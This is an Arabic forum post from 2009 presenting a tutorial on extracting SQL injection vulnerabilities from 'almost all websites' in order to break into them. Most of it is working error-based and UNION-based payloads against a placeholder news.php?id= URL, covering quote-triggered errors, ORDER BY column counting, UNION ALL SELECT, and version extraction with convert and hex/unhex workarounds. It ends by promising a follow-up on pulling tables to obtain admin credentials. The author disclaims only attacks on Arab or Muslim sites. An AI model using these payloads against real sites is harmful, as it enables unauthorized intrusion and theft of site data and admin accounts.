الدرس لإستخراج ثغرات (mysql) من كل المواقع تقريبا (حصري جدا)

by **احمد** Mon Apr 20, 2009 12:57 pm

بسم الله الرحمان الرحيم
كثير منكم يسمع عن ثغرات الأس كي أل ويطبقها كما هي بمجرد
نقل روابط أو وتطبيق ثغرة وجدها في الميلوورم او السكوريتي فوكيس مثلا ...
درسنا اليوم ان شاء الله عن استخراج ثغرات الـــ sql تدريجيا وأنواعها .
ملاحظة : الدرس للمتمرسين والمحترفين فقط وأنا بريئ امام الله في إستعماله ضد اي موقع عربي او مسلم

في هذا الدرس
أولا ماهي الــ sql injection (ثغرات الحقن لقواعد اليانات)

هي أكثر انواع أنواع الثغرات المستعملة من قبل الهاكر في إختراق المواقع
للحصول على معلومات ليس من المخول له الولوج إليها.
أسف لأن بعض المعطيات ستكون باللغة الإنقليزية لأني لن أجد مرادفا عربي لها
1 - .SQL Injection (classic or error based or whatever you call it)
2 - الجزء الأصعب وهو BLIND SQL INJECTION
إذا لنبدأ مع بعض الحركات

-1 -- sheck for vulnerability سنبحث عن خطأ أو ضعف برمجي
نقول أن عندنا موقع مثل هذا , مثلا
وسيكون هكذا
كود:
http://www.site.com/news.php?id=5
إذا كيف نعرف ان الاس كي أل ماشي معنا نضيف علامة اقتباس بعد الرابط ليصبح هكذا: هذه هي العلامة ( ')
'
كود:
http://www.site.com/news.php?id=5
إذا إذا حصلنا على خطأ مثل هذا:
كود:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
أو شيء مماثل او مشابه
يعني أن الثغرة هي sql injection
2 - الأن نبحث عن عدد العامود او column عندنا في ال sql
للبحث عن العدد المراد نكتب هذه العبارة : ORDER BY وذلك لنخبر قاعدة البيانات عن طريقة ترتيب العواميد .
اذا كيف نحصل عليها:
فقط بإضافة الارقام حتى نحصل على خطأ هكذا يعني:

كود:
http://www.site.com/news.php?id=5 order by 1/* <-- no error
كود:
http://www.site.com/news.php?id=5 order by 2/* <-- no error
كود:
http://www.site.com/news.php?id=5 order by 3/* <-- no error
كود:
http://www.site.com/news.php?id=5 order by 4/* <-- error
في الرابط رقم 4 حصلنا على خطا مثل هذا : Unknown column '4' in 'order clause' or
وهذا يعني أن لديها 3 أعمدة لأننا وصلنا للخطأ في الغضافة رقم 4 .
3- Check for UNION function
في هذه الخاصية يمكننا تعيين أكثر من وحدة في قاعدة بيانات واحدة sql .
اذا وصلنا سابقا إلى:
كود:
http://www.site.com/news.php?id=5 union all select 1,2,3/*
(حصلنا سابقا على ثلاث عواميد في العنوان الثاني ). )
اذا كان عندنا بعض الأرقام في الشاشة كما وصلنا له سابقا يعني أن UNION تعمل.
4- الحصول على إصدار ثاعدة البيانات (version) .
كود:
http://www.site.com/news.php?id=5 union all select 1,2,3/*
ملاحظة إن ام تشتغل : /* أو حصلت على خطأ حاول رسم المهام من جديد للإستفسار على العمل بشكل صحيح.
لنقول انه عندنا الرقم 2 في الشاشة ’ الان نبحث عن الاصدار:
نغير الرقم 2 بـــ :
كود:
@@version or version()
ليصبح على هذه الشاكلة تقريبا:
كود:
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
لنحصل على شي مثل هذا تقريبا:
كود:
4.1.33-log or 5.0.45
أو ما يشابهه’
يجب ان تكون مثل هذا:
كود:
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
إذا حصل على خطأمثل هذا تقريبا:
كود:
"union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
ما نحتاج اليه هو تحويل الوضيفة fonction
كود:
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
كود:
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
والان ستحصل على غصدار قاعدة البيانات هههه وهاذ هو المهم والفايدة من كل هالكلام اللي كتبناه
وإن شاء الله في العنصر الخامس اللي رح اشرحه لكم لاحقا سوف نتطرق لكيفية الحصول على الجدول وارقام الاعمدة للحصول على الــ admin هههه .
يتبع وان شاء الله يومين اكمل لكم بقية الشرح